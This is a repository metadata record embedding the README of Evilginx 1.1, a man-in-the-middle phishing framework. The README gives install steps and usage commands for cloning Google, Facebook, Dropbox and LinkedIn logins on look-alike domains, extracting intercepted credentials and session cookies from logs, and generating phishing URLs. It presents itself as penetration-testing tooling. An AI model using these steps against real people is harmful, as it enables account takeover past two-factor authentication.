{"id":13540298,"url":"https://github.com/kgretzky/evilginx","last_synced_at":"2025-05-16T13:05:02.921Z","repository":{"id":41483211,"uuid":"86985160","full_name":"kgretzky/evilginx","owner":"kgretzky","description":"PLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2","archived":false,"fork":false,"pushed_at":"2022-02-06T11:44:11.000Z","size":66,"stargazers_count":1147,"open_issues_count":46,"forks_count":269,"subscribers_count":85,"default_branch":"master","last_synced_at":"2025-04-03T08:11:56.709Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kgretzky.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-04-02T12:37:34.000Z","updated_at":"2025-03-28T23:54:26.000Z","dependencies_parsed_at":"2022-09-21T10:13:38.467Z","dependency_job_id":null,"html_url":"https://github.com/kgretzky/evilginx","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kgretzky%2Fevilginx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kgretzky%2Fevilginx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kgretzky%2Fevilginx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kgretzky%2Fevilginx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kgretzky","download_url":"https://codeload.github.com/kgretzky/evilginx/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248530757,"owners_count":21119625,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:46.009Z","updated_at":"2025-04-12T07:21:01.494Z","avatar_url":"https://github.com/kgretzky.png","language":"Python","readme":"## Evilginx v.1.1.0\n\n![Evilginx](/img/evilginx-title.png?raw=true \"Evilginx\")\n\n**THIS VERSION IS OBSOLETE. PLEASE USE THE LATEST VERSION!**\n\n**EVILGINX 2: https://github.com/kgretzky/evilginx2**\n\nEvilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes `proxy_pass` and `sub_filter` to proxy and modify HTTP content, while intercepting traffic between client and server.\n\nYou can learn how it works and how to install everything yourself on my blog:\n\nFirst post slightly outdated now: [Evilginx - Advanced Phishing With Two-factor Authentication Bypass](https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/)\n\nEvilginx 1.0 Update: [Evilginx 1.0 Update - Up Your Game in 2FA Phishing](https://breakdev.org/evilginx-1-0-update-up-your-game-in-2fa-phishing)\n\nEvilginx 1.1 Update: [Evilginx 1.1 Update](https://breakdev.org/evilginx-1-1-release/)\n\n#### Disclaimer\n\nI am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method.\nEvilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.\n\n#### Contributors Hall of Fame\n\n[@poweroftrue](https://github.com/poweroftrue)\n\n#### Installation\n\nEvilginx provides an installation script `install.sh` that takes care of installing the whole package on any Debian wheezy/jessie machine, in fire and forget manner.\n\n```\ngit clone https://github.com/kgretzky/evilginx\ncd evilginx\nchmod 700 install.sh\n./install.sh\n```\n\n#### Usage\n\n```\n            _ _       _            \n           (_) |     (_)           \n  _____   ___| | __ _ _ _ __ __  __\n / _ \\ \\ / / | |/ _` | | '_ \\\\ \\/ /\n|  __/\\ V /| | | (_| | | | | |\u003e  \u003c \n \\___| \\_/ |_|_|\\__, |_|_| |_/_/\\_\\\n                 __/ |             \n by @mrgretzky  |___/          v1.0\n\nusage: evilginx.py [-h] {setup,parse,genurl} ...\n\npositional arguments:\n  {setup,parse,genurl}\n    setup               Configure Evilginx.\n    parse               Parse log file(s).\n    genurl              Generate phishing URL.\n\noptional arguments:\n  -h, --help            show this help message and exit\n```\n\n###### Setup\n\nEnable or disable site configurations for use with Nginx server, using supplied Evilginx templates from `sites` directory.\n\n```\nusage: evilginx.py setup [-h] [-d DOMAIN] [-y]\n                         (-l | --enable ENABLE | --disable DISABLE)\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -d DOMAIN, --domain DOMAIN\n                        Your phishing domain.\n  -y                    Answer all questions with 'Yes'.\n  -l, --list            List available supported apps.\n  --enable ENABLE       Enable following site by name.\n  --disable DISABLE     Disable following site by name.\n```\n\nList available site configuration templates:\n```\npython evilginx.py setup -l\n\nListing available supported sites:\n\n - dropbox (/root/evilginx/sites/dropbox/config)\n   subdomains: www\n - google (/root/evilginx/sites/google/config)\n   subdomains: accounts, ssl\n - facebook (/root/evilginx/sites/facebook/config)\n   subdomains: www, m\n - linkedin (/root/evilginx/sites/linkedin/config)\n   subdomains: www\n```\n\nEnable google phishing site with preregistered phishing domain `not-really-google.com`:\n```\npython evilginx.py setup --enable google -d not-really-google.com\n```\n\nDisable facebook phishing site:\n```\npython evilginx.py setup --disable facebook\n```\n\n###### Parse\n\nParse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in `logs` directory, where `evilginx.py` script resides.\nThis can be done automatically after you enable auto-parsing in the **Setup** phase.\n\n```\nusage: evilginx.py parse [-h] -s SITE [--debug]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs\n                        for all sites).\n  --debug               Does not truncate log file after parsing.\n```\n\nParse logs only for google site:\n```\npython evilginx.py parse -s google\n```\n\nParse logs for all available sites:\n```\npython evilginx.py parse -s all\n```\n\n###### Generate URL\n\nGenerate phishing URLs that you can use in your Red Team Assessments.\n\n```\nusage: evilginx.py genurl [-h] -s SITE -r REDIRECT\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SITE, --site SITE  Name of site to generate link for.\n  -r REDIRECT, --redirect REDIRECT\n                        Redirect user to this URL after successful sign-in.\n```\n\nGenerate google phishing URL that will redirect victim to rick'roll video on successful login:\n```\npython evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ\n\nGenerated following phishing URLs:\n\n : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ\n : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ\n```\n","funding_links":[],"categories":["\u003ca id=\"d5e869a870d6e2c14911de2bc527a6ef\"\u003e\u003c/a\u003e古老的\u0026\u0026有新的替代版本的","Tools","Python (1887)","\u003ca id=\"42f9e068b6511bcbb47d6b2b273097da\"\u003e\u003c/a\u003e未分类","Python","Social Engineering Tools"],"sub_categories":["\u003ca id=\"86dc226ae8a71db10e4136f4b82ccd06\"\u003e\u003c/a\u003e密码","\u003ca id=\"3bd67ee9f322e2c85854991c85ed6da0\"\u003e\u003c/a\u003e投毒\u0026\u0026Poisoning","Social Engineering Tools","Penetration Testing Report Templates"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkgretzky%2Fevilginx","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkgretzky%2Fevilginx","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkgretzky%2Fevilginx/lists"}